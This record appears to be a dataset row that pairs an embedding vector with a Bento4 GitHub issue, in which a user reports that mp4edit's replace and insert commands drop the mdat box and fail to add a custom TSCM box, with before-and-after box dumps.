-0.020784761756658554, 0.0033868353348225355, -0.006521712057292461, -0.007244723848998547, -0.010348562151193619, 0.007157085929065943, -0.0031312252394855022, 0.019762320443987846, 0.02109149470925331, 0.01941177062690258, -0.012612538412213326, -0.002607224276289344, 0.017366888001561165, -0.014496751129627228, -0.01700173132121563, 0.007233769167214632, 0.0030928836204111576, 0.016811849549412727, 0.014927636831998825, -0.014642814174294472, -0.011203031055629253, -0.009494094178080559, -0.006839399226009846, -0.006707942578941584, 0.019514014944434166, 0.016797242686152458, -0.014781573787331581, 0.005798700265586376, -0.011020451784133911, 0.006204024888575077, -0.007909310050308704, 0.0086031099781394, -0.010034526698291302, -0.003206082386896014, 0.013116455636918545, -0.02503519505262375, -0.0070037199184298515, -0.007865491323173046, 0.007474773097783327, -0.010414290241897106, 0.004261387512087822, -0.014350688084959984, -0.01603771559894085, -0.037012360990047455, -0.009304211474955082, 0.011473246850073338, -0.01519055012613535, 0.020244328305125237, 0.009172755293548107, -0.009260392747819424, -0.014241140335798264, -0.0003197409969288856, 0.005254615563899279, 0.00018075293337460607, 0.0032626818865537643, -0.00685400515794754, 0.022391455247998238, 0.001493494026362896, 0.004232174716889858, 0.0005039172829128802, 0.01469393540173769, 0.006123690400272608, -0.0027715449687093496, 0.01164121925830841, -0.01457708515226841, 0.012481081299483776, 0.01776125840842724, 0.0071862987242639065, -0.01916346326470375, -0.008982873521745205, 0.01578940823674202, -0.011874920688569546, 0.011137302033603191, 0.009282302111387253, 0.04384810850024223, -0.013372065499424934, -0.013182183727622032, -0.002212854102253914, 0.017133187502622604, 0.011612007394433022, 0.019280312582850456, -0.0013173054903745651, -0.00002135315298801288, 0.01020980253815651, -0.009771613404154778, -0.016461297869682312, 0.015380431897938251, -0.001887864083983004, 0.015920864418148994, -0.000011389774044801015, -0.015599526464939117, -0.011947952210903168, 0.007566062267869711, 0.015584919601678848, 0.0044914367608726025, -0.008113798685371876, 0.009377242997288704, -0.00016683130525052547, -0.01841854117810726, 0.01092551089823246, -0.006200373638421297, -0.007493030745536089, 0.02672952599823475, -0.007051190361380577, -0.00582791306078434, -0.0014341558562591672, 0.01628602296113968, 0.005207145120948553, 0.003215211443603039, 0.0368955098092556, -0.0029559496324509382, 0.009311514906585217, 0.006572834216058254, 0.019002793356776237, 0.015234368853271008, 0.008990176022052765, -0.018593817949295044, -0.007748641073703766, -0.02595539204776287, 0.022289210930466652, 0.003032632637768984, -0.007697518914937973, 0.009742400608956814, 0.015205156058073044, 0.0034963826183229685, 0.0040678540244698524, 0.005608818493783474, -0.031929366290569305, 0.002534192753955722, -0.011955254711210728, -0.009552518837153912, 0.016139959916472435, 0.006890520919114351, -0.020594879984855652, -0.007653700187802315, -0.003490905277431011, -0.003580368822440505, 0.010377774946391582, 0.003697219304740429, -0.011809191666543484, 0.0201420858502388, -0.007485727779567242, -0.014284959062933922, -0.01941177062690258, 0.01261984184384346, 0.005952066276222467, 0.010122164152562618, 0.0029340400360524654, -0.014146199449896812, -0.023004919290542603, -0.01555570773780346, 0.009041298180818558, 0.02091621793806553, 0.009450274519622326, -0.008982873521745205, 0.008055373094975948, 0.005426239687949419, -0.010063739493489265, -0.00036150586674921215, -0.0007914787856861949, -0.030790075659751892, -0.0008065415313467383, -0.017659014090895653, 0.007456514984369278, 0.005185235757380724, -0.008099191822111607, 0.011517065577208996, -0.0163006279617548, -0.0015099260490387678, -0.0374213345348835, 0.030468737706542015, -0.009296908974647522, -0.004221220035105944, 0.000666412350255996, -0.007317755371332169, -0.03473377600312233, 0.0018276131013408303, -0.007931219413876534, -0.021792596206068993, -0.00631357217207551, 0.009924979880452156, -0.019996022805571556, -0.033652909100055695, -0.03125747665762901, -0.019791534170508385, -0.006700639147311449, 0.010027223266661167, -0.0014213754329830408, -0.030790075659751892, 0.007485727779567242, -0.02039039134979248, -0.0047360919415950775, -0.026612674817442894, -0.019075825810432434, 0.002050359034910798, 0.013788345269858837, 0.010231711901724339, -0.023472320288419724, 0.004973444622009993, 0.008829507045447826, -0.02163192816078663, 0.0029760331381112337, 0.0163006279617548, -0.0005249138339422643, 0.0022731050848960876, -0.012188956141471863, -0.015628738328814507, -0.008179526776075363, 0.009786219336092472, 0.009421062655746937, 0.02599921077489853, -0.012882755137979984, -0.0020394043531268835, -0.011363700032234192, -0.016402872279286385, 0.0011831101728603244, -0.01647590473294258, -0.010874388739466667, 0.004166446626186371, -0.005353208165615797, 0.009764309972524643, 0.013525431975722313, 0.007566062267869711, -0.01723543182015419, -0.003103838302195072, 0.010019920766353607, -0.03648653253912926, 0.020813975483179092, 0.006634911056607962, 0.00861041247844696, -0.005977627355605364, 0.018009565770626068, -0.0030198520980775356, -0.0002617722493596375, -0.0106918103992939, 0.001692504738457501, 0.008216043002903461, -0.00142867851536721, -0.01673881709575653, 0.015380431897938251, -0.030965352430939674, 0.01126875914633274, 0.02036117948591709, 0.001859564334154129, 0.01746913231909275, -0.011414822190999985, 0.011838404461741447, 0.019324133172631264, 0.00814301148056984, -0.0021927705965936184, 0.009406455792486668, 0.025794722139835358, 0.0076098814606666565, 0.014810786582529545, -0.0083767119795084, -0.013832163996994495, 0.005904595833271742, 0.010713719762861729, 0.010830570012331009, -0.00010292875958839431, 0.022464485839009285, -0.02332625724375248, 0.006583788897842169, 0.005024566315114498, -0.006401210092008114, -0.004323464352637529, 0.002826318610459566, -0.001603041193448007, 0.018009565770626068, 0.01871066726744175, -0.0005390637088567019, -0.0006531754042953253, 0.005711062345653772, 0.0009306950378231704, 0.00945757795125246, 0.0018714319448918104, -0.004210265353322029, 0.009764309972524643, 0.012335019186139107, 0.014277656562626362, -0.008551987819373608, 0.004549861885607243, -0.026101455092430115, 0.018885944038629532, -0.0045644682832062244, 0.0012497514253482223, 0.00015336612705141306, -0.014080471359193325, -0.005984930787235498, -0.01313106156885624, 0.008427834138274193, -0.02233302965760231, -0.004571771249175072, -0.024582399055361748, -0.001391249941661954, -0.003273636568337679, 0.03406188637018204, 0.008800294250249863, -0.017410706728696823, 0.011779979802668095, -0.025166651234030724, -0.006948946509510279, -0.011356396600604057, 0.007982341572642326, -0.003176869824528694, 0.02374984137713909, 0.01407316792756319, -0.015234368853271008, 0.002959601115435362, -0.008646928705275059, 0.009194664657115936, 0.017673620954155922, 0.016797242686152458, -0.00920927058905363, -0.03391582518815994, 0.009070510976016521, 0.004024035297334194, 0.006587440613657236, 0.013167577795684338, 0.006704290863126516, 0.012057499028742313, -0.016943305730819702, 0.019499408081173897, 0.007073099724948406, -0.013656889088451862, -0.019484801217913628, -0.03838535025715828, 0.004593680612742901, -0.010509231127798557, -0.013569250702857971, -0.027751965448260307, 0.0017153271473944187, -0.0044950880110263824, -0.011612007394433022, 0.0010845176875591278, 0.017542164772748947, 0.015847833827137947, -0.010355865582823753, -0.013905195519328117, -0.008698050864040852, 0.029913699254393578, -0.008581199683248997, 0.02091621793806553, -0.01287545170634985, 0.014971455559134483, 0.0036880902480334044, -0.01865224353969097, -0.02132519520819187, -0.0019736760295927525, -0.006941643077880144, 0.020945431664586067, 0.0007152521866373718, -0.010370471514761448, -0.013751829974353313, -0.01056035328656435, 0.013919802382588387, 0.0018175712320953608, 0.000007937895134091377, 0.006718897260725498, 0.011444034986197948, 0.004400147125124931, 0.01055305078625679, 0.014241140335798264, 0.012868148274719715, -0.011086179874837399, 0.02892046980559826, 0.005616121459752321, 0.012955786660313606, -0.006207676604390144, 0.02186562865972519, 0.0010735628893598914, 0.015219762921333313, -0.026130666956305504, -0.00038204598240554333, -0.008763778954744339, -0.0393785797059536, 0.007675609551370144, 0.005247312597930431, 0.0003571696288418025, 0.014160806313157082, 0.01502988114953041, 0.018856730312108994, 0.012050195597112179, 0.025137439370155334, -0.009464881382882595, 0.017615195363759995, -0.0003069604863412678, 0.010545747354626656, -0.004056899342685938, -0.01455517578870058, -0.028350824490189552, 0.009603640995919704, 0.0047324406914412975, -0.0018568256637081504, -0.008018857799470425, -0.002826318610459566, 0.011867617256939411, 0.01798035204410553, -0.00812840461730957, 0.011502459645271301, -0.026305943727493286, 0.0016733340453356504, 0.01555570773780346, 0.01019519567489624, 0.023150982335209846, -0.003719128668308258, 0.016329841688275337, -0.0022018994204699993, -0.014861908741295338, -0.03473377600312233, 0.005623424891382456, -0.0075733656994998455, 0.011692341417074203, -0.002614527242258191, -0.022040903568267822, -0.010830570012331009, 0.0011831101728603244, -0.00010332814417779446, 0.005272873677313328, 0.0026601720601320267, -0.013649585656821728, 0.0031823471654206514, 0.00029052840545773506, -0.008435137569904327, -0.019280312582850456, -0.018272478133440018, 0.00577313918620348, -0.01654893532395363, -0.010647991672158241, -0.004600984044373035, 0.018608422949910164, 0.015161337330937386, 0.0025889663957059383, -0.012897361069917679, 0.0001534802431706339, -0.0030052459333091974, 0.020463423803448677, 0.01698712445795536, -0.0032535528298467398, -0.010545747354626656, -0.02113531343638897, -0.001208671135827899, 0.003315629670396447, -0.012532203458249569, 0.014869211241602898, 0.010815964080393314, 0.013678798452019691, -0.03187094256281853, 0.007485727779567242, 0.015935471281409264, 0.026057636365294456, 0.04297173023223877, -0.020244328305125237, 0.005988582037389278, -0.02624751813709736, 0.011371003463864326, -0.011356396600604057, -0.010969329625368118, -0.008106495253741741, -0.01672421209514141, -0.00075724528869614, 0.005532135255634785, -0.01358385756611824, 0.005214448552578688, -0.001750017050653696, -0.015584919601678848, -0.018330903723835945, -0.014752360992133617, 0.0019864565692842007, -0.013693404383957386, 0.024363305419683456, 0.0004893110017292202, 0.02429027296602726, -0.013883286155760288, 0.0032188629265874624, 0.008427834138274193, 0.02018590457737446, -0.013751829974353313, -0.0006819315603934228, -0.03277653455734253, -0.006412164773792028, 0.014007439836859703, 0.0014213754329830408, 0.004758001770824194, 0.017308462411165237, -0.006123690400272608, 0.005229054484516382, 0.014525962993502617, -0.008457046933472157, 0.01577480137348175, 0.000036743967939401045, -0.02578011527657509, 0.00011365526006557047, 0.021909447386860847, -0.004779911134392023, 0.01200637686997652, 0.0018476967234164476, 0.015906259417533875, -0.01678263582289219, -0.004754350055009127, 0.0016651180339977145, -0.008216043002903461, 0.0002230883837910369, 0.019251100718975067, -0.01333555020391941, 0.01993759721517563, 0.022654367610812187, 0.005999536719173193, 0.0066896844655275345, 0.003987519536167383, -0.019309526309370995, -0.0023242272436618805, -0.01409507729113102, -0.007346967700868845, 0.003638793947175145, 0.02376444637775421, -0.004520649090409279, -0.0000165034052770352, -0.01774665154516697, -0.011940648779273033, -0.0033704033121466637, 0.020740943029522896, 0.0024648127146065235, -0.0023534398060292006, -0.012678266502916813, -0.014489447697997093, 0.001120120519772172, 0.008398621343076229, -0.013087242841720581, -0.024874525144696236, 0.0016852016560733318, 0.014679329469799995, -0.0040751569904387, -0.020025234669446945, 0.0005244573694653809, -0.0032553786877542734, 0.026641888543963432, 0.023676808923482895, -0.03625283017754555, 0.002680255798622966, 0.0031220961827784777, 0.00982273556292057, 0.022668974474072456, -0.01578940823674202, 0.005798700265586376, 0.001859564334154129, 0.03905723989009857, 0.006499802693724632, -0.006722548510879278, 0.010662597604095936, 0.012897361069917679, 0.009369940496981144, -0.014591692015528679, -0.0003530616231728345, 0.008091889321804047, 0.006934340111911297, -0.010516534559428692, -0.007522243540734053, -0.020740943029522896, 0.015526494942605495, 0.022143147885799408, 0.01964547112584114, -0.004020383581519127, -0.0011164689203724265, 0.0002693036221899092, 0.017060156911611557, 0.001567438361234963, -0.004239478148519993, -0.0024556838907301426, -0.012583325617015362, -0.008573897182941437, -0.0056197731755673885, -0.010538443922996521, -0.012327715754508972, -0.03137432783842087, 0.005104901269078255, 0.009618246927857399, 0.02963617816567421, -0.00036743967211805284, 0.00047653046203777194, 0.0031622634269297123, 0.018316296860575676, -0.0027642420027405024, -0.003779379650950432, 0.015920864418148994, 0.0011630264343693852, -0.015278187580406666, 0.021076887845993042, -0.01094742026180029, 0.007653700187802315, 0.02743062749505043, 0.017352283000946045, 0.018871337175369263, -0.013927104882895947, 0.005941111594438553, 0.007602578029036522, 0.025648659095168114, 0.01118112076073885, 0.01347430981695652, 0.013737223111093044, -0.013905195519328117, 0.00888062920421362, 0.011217636987566948, -0.007073099724948406, -0.003711825469508767, 0.017118580639362335, -0.013751829974353313, -0.0006472415989264846, -0.013277124613523483, 0.02183641493320465, 0.01469393540173769, -0.03008897416293621, 0.017878109589219093, 0.005973976105451584, -0.006645865738391876, -0.014818089082837105, 0.015716377645730972, -0.011612007394433022, 0.0013437793822959065, 0.011356396600604057, 0.005163326393812895, -0.008281771093606949, 0.010151376947760582, 0.027386808767914772, 0.009099723771214485, -0.0023041435051709414, -0.006598395295441151, -0.02135440707206726, 0.000193989893887192, 0.004684970248490572, -0.010772144421935081, 0.009282302111387253, -0.0049551865085959435, -0.02282964438199997, 0.004706879612058401, -0.008267165161669254, 0.009757007472217083, 0.0047689564526081085, -0.004871200304478407, 0.03549330309033394, 0.01470854226499796, 0.007153434678912163, 0.021792596206068993, 0.009764309972524643, -0.010823266580700874, -0.008646928705275059, 0.0002834534680005163, -0.02626212313771248, -0.02503519505262375, -0.01967468298971653, -0.022201573476195335, -0.0213836207985878, 0.012583325617015362, 0.0037099996116012335, 0.007441909052431583, 0.001200455124489963, -0.010239015333354473, -0.002890221308916807, -0.005999536719173193, 0.01395631767809391, -0.03277653455734253, -0.007054842077195644, -0.009640156291425228, -0.005502922926098108, 0.004159143194556236, 0.015891652554273605, -0.014160806313157082, -0.019061218947172165, 0.011509763076901436, 0.0004546210402622819, 0.014109684154391289, -0.037976376712322235, -0.00006966519868001342, -0.010034526698291302, -0.010392380878329277, -0.009851948358118534, -0.017147794365882874, 0.015716377645730972, 0.040196530520915985, 0.004586377646774054, -0.0010480019263923168, -0.0012378838146105409, 0.000023820817659725435, 0.016388267278671265, 0.027971060946583748, -0.015395037829875946, -0.0007353358087129891, -0.0013574728509411216, 0.0002218331501353532, -0.02208472229540348, -0.026028422638773918, -0.010041830129921436, 0.014635510742664337, -0.012495688162744045, 0.005261918995529413, 0.014000136405229568, 0.009662066586315632, 0.02161732129752636, 0.0003455302503425628, -0.016198383644223213, 0.0011730683036148548, 0.004312509670853615, 0.001786532811820507, -0.002028449671342969, 0.014752360992133617, -0.010983936488628387, 0.0024502065498381853, -0.01264905370771885, -0.0027496356051415205, 0.00571471406146884, -0.013291731476783752, -0.02649582549929619, 0.027971060946583748, -0.012481081299483776, 0.017673620954155922, -0.00379398581571877, 0.006711593829095364, 0.000018357719454797916, 0.0326012559235096, -0.00005585767939919606, 0.012612538412213326, -0.014314171858131886, 0.005784093867987394, 0.0016888532554730773, 0.005364162847399712, 0.0029906395357102156, 0.005225403234362602, -0.026583462953567505, -0.0031239220406860113, -0.010129467584192753, -0.02861373871564865, 0.01530740037560463, -0.017600588500499725, -0.01723543182015419, -0.02618909254670143, 0.019849959760904312, 0.00436363136395812, 0.002979684853926301, 0.03543487936258316, -0.028482280671596527, 0.001669682445935905, -0.0005125897587276995, 0.013729920610785484, -0.0031494831200689077, 0.005743926856666803, 0.001178545644506812, -0.018301691859960556, 0.014379900880157948, 0.0019955853931605816, 0.007821672596037388, -0.004816426895558834, 0.010217105969786644, -0.005711062345653772, -0.025385746732354164, 0.003976564854383469, 0.0083767119795084, -0.009048601612448692, 0.007668306585401297, 0.0034744732547551394, 0.0016660308465361595, -0.002935865893959999, -0.007675609551370144, -0.01188952662050724, -0.010480019263923168, 0.0242464542388916, 0.018783699721097946, -0.010370471514761448, -0.040634721517562866, -0.008201436139643192, 0.020740943029522896, 0.005126810632646084, 0.0007444647490046918, 0.0012680093059316278, -0.023472320288419724, -0.01370801031589508, -0.012086711823940277, -0.01407316792756319, -0.00288656959310174, -0.007135176565498114, 0.010801357217133045, 0.021237557753920555, -0.003144005546346307, 0.002344310749322176, 0.009282302111387253, -0.014219230972230434, -0.0013309989590197802, 0.03356527164578438, 0.0040751569904387, -0.01774665154516697, -0.008384015411138535, 0.010114861652255058, 0.03552251681685448, 0.004761653020977974, -0.023413896560668945, 0.030644012615084648, 0.015570313669741154, -0.01776125840842724, 0.007168040610849857, -0.01913425140082836, 0.020463423803448677, -0.0036716582253575325, 0.010129467584192753, -0.0015382257988676429, 0.0006632172153331339, 0.000472422456368804, 0.000501635076943785, -0.013445097021758556, 0.011319881305098534, -0.0008709005196578801, -0.0005605166661553085, 0.006342784967273474, 0.016373660415410995, 0.00251958635635674, 0.011670432053506374, -0.005367814563214779, -0.007153434678912163, -0.004717834293842316, -0.00013191312609706074, -0.008310983888804913, 0.011926041916012764, 0.00619672192260623, 0.011363700032234192, -0.007065796758979559, -0.000681018631439656, -0.001975501887500286, 0.006536318454891443, 0.015205156058073044, 0.03806401416659355, 0.001676985644735396, 0.025882359594106674, 0.02576551027595997, -0.010735629126429558, 0.0011977164540439844, -0.021179132163524628, -0.0017180658178403974, -0.025166651234030724, -0.007131524849683046, -0.019061218947172165, 0.017396101728081703, -0.024392517283558846, -0.004933277145028114, 0.026758737862110138, 0.012152439914643764, -0.018856730312108994, 0.018739880993962288, 0.006941643077880144, -0.020784761756658554, 0.016621967777609825, 0.0026966878212988377, 0.005707411095499992, 0.018798304721713066, -0.0010123989777639508, 0.025896966457366943, -0.0009621898643672466, -0.006437725853174925, -0.012583325617015362, 0.015380431897938251, -0.016212990507483482, -0.0021562548354268074, 0.007580668665468693, 0.0066166529431939125, -0.0007896529859863222, 0.025312714278697968, -0.023603778332471848, -0.0071862987242639065, -0.015365825966000557, 0.0008631409145891666, -0.013452400453388691, -0.005933808628469706, 0.010531140491366386, -0.006813838146626949, -0.008639625273644924, 0.026525037363171577, 0.04192007705569267, -0.013196790590882301, 0.00972779467701912, 0.025152044370770454, 0.009976102039217949, -0.01792192831635475, -0.014584388583898544, 0.004575422964990139, -0.0012333192862570286, 0.003273636568337679, 0.0015856962418183684, 0.005605166777968407, -0.014657420106232166, -0.02188023366034031, -0.007419999223202467, 0.02523968368768692, 0.008274467661976814, -0.0060616135597229, -0.04422787204384804, -0.000563255394808948, 0.0026546947192400694, 0.005703759379684925, 0.0006828444311395288, -0.0046959249302744865, -0.018520785495638847, -0.009187361225485802, 0.015205156058073044, 0.021485865116119385, 0.01275860145688057, 0.005250964313745499, 0.014511357061564922, -0.01768822781741619, -0.008522775024175644, 0.0013666017912328243, -0.010487321764230728, 0.0076829129830002785, 0.006094478070735931, 0.0008147575426846743, -0.002853705547749996, 0.009698581881821156, -0.011349093168973923, 0.01164121925830841, -0.0053057377226650715, -0.011027755215764046, 0.014518660493195057, -0.0033631001133471727, 0.008581199683248997, -0.007770550437271595, 0.004374586045742035, -0.008274467661976814, 0.007653700187802315, 0.011699644848704338, 0.020054446533322334, 0.013320944271981716, -0.011224940419197083, -0.0006791928317397833, 0.0036643550265580416, 0.023486927151679993, 0.0060068401508033276, -0.019251100718975067, 0.003330236067995429, -0.004568119533360004, 0.004677666816860437, -0.011217636987566948, -0.01273669209331274, -0.01517594326287508, 0.005882686469703913, -0.008384015411138535, 0.006514409091323614, 0.003529246663674712, -0.00704388739541173, -0.0032845912501215935, 0.019236493855714798, 0.0036935675889253616, 0.0055467416532337666, 0.01554110087454319, -0.005743926856666803, -0.013810254633426666, 0.0022292863577604294, -0.010757538489997387, 0.00956712570041418, 0.01225468423217535, 0.00823795236647129, 0.03803480044007301, -0.008646928705275059, 0.030906926840543747, 0.029081139713525772, 0.003704522270709276, -0.002957775257527828, 0.035785429179668427, 0.01697251759469509, -0.016417479142546654, 0.01602310873568058, -0.012546810321509838, -0.021018462255597115, 0.008267165161669254, 0.0027934545651078224, 0.022391455247998238, -0.014270353130996227, 0.016344446688890457, -0.005177932791411877, 0.001392162754200399, 0.001669682445935905, -0.008771082386374474, -0.0005536699900403619, -0.00002313614822924137, 0.00872726272791624, 0.018126415088772774, 0.011122696101665497, 0.003018026240170002, 0.008778384886682034, 0.013766435906291008, 0.021412832662463188, 0.00046511931577697396, -0.01795114018023014, -0.014014743268489838, 0.01606692746281624, 0.01188952662050724, -0.033594485372304916, 0.010742932558059692, 0.0021361710969358683, -0.005835216026753187, -0.010385078378021717, 0.002853705547749996, -0.010932814329862595, 0.0020193206146359444, -0.018097203224897385, 0.002276756800711155, -0.0005988582270219922, 0.0010991239687427878, -0.009494094178080559, -0.011436731554567814, 0.01770283281803131, -0.022639762610197067, -0.006547273136675358, 0.009012086316943169, -0.007493030745536089, -0.013934408314526081, -0.017133187502622604, -0.00801155436784029, -0.00972779467701912, 0.01745452545583248, 0.0061565544456243515, 0.009720491245388985, -0.023486927151679993, 0.010129467584192753, -0.00824525486677885, 0.008617715910077095, -0.014043956063687801, 0.005137765314429998, 0.0011685038916766644, 0.0012762253172695637, -0.04078078269958496, 0.012926573865115643, 0.014431022107601166, 0.009859250858426094, -0.002305969363078475, -0.0032316434662789106, -0.008413227275013924, -0.013233305886387825, -0.014080471359193325, 0.004502391442656517, 0.0005796874756924808, -0.0015400515403598547, -0.033652909100055695, -0.007807066198438406, -0.00243194866925478, 0.0014378074556589127, 0.005448149051517248, -0.0005513877258636057, 0.012729388661682606, -0.008705353364348412, 0.011765372939407825, -0.015672557055950165, 0.0135911600664258, 0.020740943029522896, 0.012809723615646362, -0.020200509577989578, 0.0043818894773721695, 0.010319349355995655, -0.005075688473880291, -0.011385609395802021, -0.02185102179646492, 0.0011612006928771734, 0.015088305808603764, -0.005933808628469706, 0.010085648857057095, 0.003896229900419712, -0.002760590286925435, -0.012678266502916813, 0.027313778176903725, 0.0242464542388916, 0.0030928836204111576, -0.014905727468430996, 0.010845175944268703, 0.0008111060014925897, 0.01032665278762579, -0.006729851942509413, 0.002923085354268551, 0.001684288727119565, -0.025079013779759407, 0.003646097145974636, -0.012743995524942875, 0.01470854226499796, -0.021807203069329262, -0.02670031227171421, 0.010772144421935081, -0.004794517531991005, -0.024889132007956505, 0.018024172633886337, 0.009245786815881729, -0.006437725853174925, -0.0022731050848960876, -0.0023004920221865177, 0.02696322649717331, 0.0036205360665917397, 0.012524900957942009, 0.009311514906585217, -0.009406455792486668, 0.003896229900419712, 0.00849356222897768, 0.012342321686446667, -0.013182183727622032, -0.019543226808309555, -0.015219762921333313, 0.004469527397304773, -0.011714250780642033, -0.01577480137348175, -0.00803346373140812, -0.026787951588630676, -0.010859782807528973, -0.004871200304478407, 0.006686032749712467, 0.0053422534838318825, 0.0051925391890108585, -0.02256673015654087, 0.005367814563214779, 0.006740806624293327, -0.004889458417892456, 0.00509394658729434, 0.019484801217913628, -0.007595275063067675, -0.007423650939017534, 0.003815895412117243, 0.00897557009011507, -0.0019207282457500696, 0.05299165099859238, 0.009121633134782314, 0.005470058415085077, 0.011465944349765778, -0.009304211474955082, -0.005732972174882889, 0.007211859803646803, 0.016884880140423775, -0.007270284928381443, -0.011261455714702606, -0.010531140491366386, 0.005860777106136084, -0.008113798685371876, -0.007266633212566376, -0.02303413115441799, -0.00758797163143754, -0.0018769092857837677, -0.010626082308590412, -0.014496751129627228, -0.028599131852388382, 0.005429891403764486, -0.00008575494575779885, 0.006240540649741888, -0.01555570773780346, 0.00509759783744812, 0.0007531372248195112, 0.011020451784133911, -0.024597005918622017, -0.001340127899311483, 0.011750767007470131, 0.005824261344969273, -0.006222283001989126, 0.00619672192260623, 0.004425708204507828, 0.00648519629612565, -0.008384015411138535, -0.008442440070211887, 0.005897292867302895, -0.02354535274207592, -0.024202635511755943, -0.024626217782497406, -0.002539670094847679, -0.010041830129921436, 0.006532666739076376, -0.024319486692547798, 0.020434211939573288, -0.013547341339290142, 0.04840527102351189, 0.026305943727493286, 0.028350824490189552, 0.01372261717915535, 0.008683444000780582, 0.005670895334333181, -0.0038122436963021755, 0.009413759224116802, -0.0003297828370705247, 0.013079940341413021, -0.010801357217133045, -0.028978895395994186, -0.020960038527846336, 0.0038706690538674593, -0.004593680612742901, -0.02084318734705448, -0.010998542420566082, -0.02278582565486431, -0.0004701402212958783, -0.0024264713283628225, 0.002364394487813115, -0.0014487621374428272, 0.014752360992133617, -0.005353208165615797, -0.021310588344931602, 0.0016897660680115223, -0.017074761912226677, -0.0006303530535660684, -0.033594485372304916, -0.0016961563378572464, -0.01576019637286663, 0.009267696179449558, 0.008844113908708096, -0.02041960507631302, -0.018812911584973335, 0.005995885469019413, -0.002935865893959999, 0.013058030046522617, 0.0011036883806809783, -0.006273405160754919, 0.004568119533360004, 0.009143542498350143, -0.016344446688890457, 0.02234763652086258, 0.008223345503211021, -0.002203725278377533, -0.03131590411067009, 0.019733108580112457, 0.002621830441057682, 0.00048657230217941105, 0.012167045846581459, -0.0012890058569610119, 0.0009302386315539479, 0.016607360914349556, -0.017790470272302628, -0.015643345192074776, -0.005725668743252754, 0.00747112138196826, -0.032659683376550674, 0.005550393369048834, -0.017673620954155922, -0.009530609473586082, 0.009501396678388119, 0.012722085230052471, 0.00367713556624949, -0.018593817949295044, -0.0291395653039217, 0.0003793073119595647, -0.009742400608956814, 0.011013148352503777, -0.015409644693136215, 0.0011082529090344906, 0.01847696676850319, -0.01214513648301363, 0.015117518603801727, 0.023866690695285797, -0.006324526853859425, -0.00656187953427434, -0.0025232380721718073, 0.012152439914643764, 0.015146731398999691, 0.023428501561284065, -0.009136239066720009, 0.01009295228868723, 0.017337676137685776, 0.007945826277136803, 0.009873857721686363, 0.008668838068842888, -0.0015510062221437693, -0.009194664657115936, 0.012422656640410423, 0.009983404539525509, 0.02303413115441799, 0.014657420106232166, 0.040196530520915985, 0.009830038994550705, 0.0027697193436324596, -0.024830706417560577, 0.008844113908708096, 0.0002839099324773997, 0.005645334254950285, 0.0038852752186357975, 0.00004424681173986755, -0.004925974179059267, -0.00035968009615316987, 0.004261387512087822, 0.0003211103321518749, 0.011969861574470997, 0.015000668354332447, 0.010406987741589546, 0.019280312582850456, -0.004221220035105944, 0.004170097876340151, -0.008216043002903461, 0.0017536686500534415, 0.006529015023261309, -0.03327314555644989, 0.006755413021892309, -0.009180058725178242, 0.024334091693162918, 0.004349025432020426, 0.01792192831635475, -0.015336613170802593, -0.023501534014940262, -0.013393975794315338, -0.004652105737477541, -0.008405924774706364, 0.02017129771411419, -0.002196422079578042, 0.009472183883190155, 0.004195658955723047, 0.017293857410550117, 0.011400215327739716, 0.00588633818551898, 0.010721023194491863, -0.03274732083082199, -0.010742932558059692, 0.017060156911611557, -0.005842519458383322, 0.00957442820072174, -0.0006344610592350364, 0.007058493327349424, 0.007785156834870577, 0.019309526309370995, -0.02256673015654087, 0.003419699613004923, 0.002001062734052539, -0.018623029813170433, 0.007989645004272461, -0.004663060884922743, -0.009464881382882595, 0.005188887473195791, -0.007763247471302748, 0.0170163381844759, 0.003531072521582246, -0.004900413099676371, 0.022888069972395897 ]
2,259
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
``` mp4edit.exe --replace TSCM:1.tscm 1.trec 2.trec mp4edit.exe --insert TSCM:1.tscm 1.trec 2.trec ``` Original file info ``` [ftyp] size=8+16 major_brand = mp42 minor_version = 0 compatible_brand = mp42 compatible_brand = isom [free] size=8+128 [mdat] size=16+8994395 [moov] size=8+2634 [mvhd] size=12+108, version=1 timescale = 1000 duration = 12366 duration(ms) = 12366 [iods] size=12+12 [InitialObjectDescriptor] size=5+7 id = 1 include inline profile level flag = 0 OD profile level = ff scene profile level = ff audio profile level = ff visual profile level = ff graphics profile level = ff [trak] size=8+2482 [tkhd] size=12+92, version=1, flags=1 enabled = 1 id = 1 duration = 12366 width = 2560.000000 height = 1440.000000 [mdia] size=8+2351 [mdhd] size=12+32, version=1 timescale = 30 duration = 371 duration(ms) = 12366 language = und [hdlr] size=12+21 handler_type = vide handler_name = [minf] size=8+2266 [vmhd] size=12+8, flags=1 graphics_mode = 0 op_color = 0000,0000,0000 [dinf] size=8+28 [dref] size=12+16 [url ] size=12+0, flags=1 location = [local to file] [stbl] size=8+2202 [stsd] size=12+134 entry_count = 1 [tsc2] size=8+122 data_reference_index = 1 [stts] size=12+364 entry_count = 45 [stsz] size=12+1376 sample_size = 0 sample_count = 342 [stsc] size=12+124 entry_count = 10 [co64] size=12+108 entry_count = 13 [stss] size=12+24 entry_count = 5 [udta] size=8+11 [name] size=8+3 [free] size=8+128 [TSCR] size=16+64 [TSCM] size=16+13124 ``` new file ``` [ftyp] size=8+16 major_brand = mp42 minor_version = 0 compatible_brand = mp42 compatible_brand = isom [free] size=8+128 [moov] size=8+2634 [mvhd] size=12+108, version=1 timescale = 1000 duration = 12366 duration(ms) = 12366 [iods] size=12+12 [InitialObjectDescriptor] size=5+7 id = 1 include inline profile level flag = 0 OD profile level = ff scene profile level = ff audio profile level = ff visual profile level = ff graphics profile level = ff [trak] size=8+2482 [tkhd] size=12+92, version=1, flags=1 enabled = 1 id = 1 duration = 12366 width = 2560.000000 height = 1440.000000 [mdia] size=8+2351 [mdhd] size=12+32, version=1 timescale = 30 duration = 371 duration(ms) = 12366 language = und [hdlr] size=12+21 handler_type = vide handler_name = [minf] size=8+2266 [vmhd] size=12+8, flags=1 graphics_mode = 0 op_color = 0000,0000,0000 [dinf] size=8+28 [dref] size=12+16 [url ] size=12+0, flags=1 location = [local to file] [stbl] size=8+2202 [stsd] size=12+134 entry_count = 1 [tsc2] size=8+122 data_reference_index = 1 [stts] size=12+364 entry_count = 45 [stsz] size=12+1376 sample_size = 0 sample_count = 342 [stsc] size=12+124 entry_count = 10 [co64] size=12+108 entry_count = 13 [stss] size=12+24 entry_count = 5 [udta] size=8+11 [name] size=8+3 [free] size=8+128 [TSCR] size=16+64 ```
It destroys the original structure and does not add custom box
https://api.github.com/repos/axiomatic-systems/Bento4/issues/647/comments
1
2021-08-30T02:22:24
2022-07-09T12:01:48Z
https://github.com/axiomatic-systems/Bento4/issues/647
982,308,744
647
false
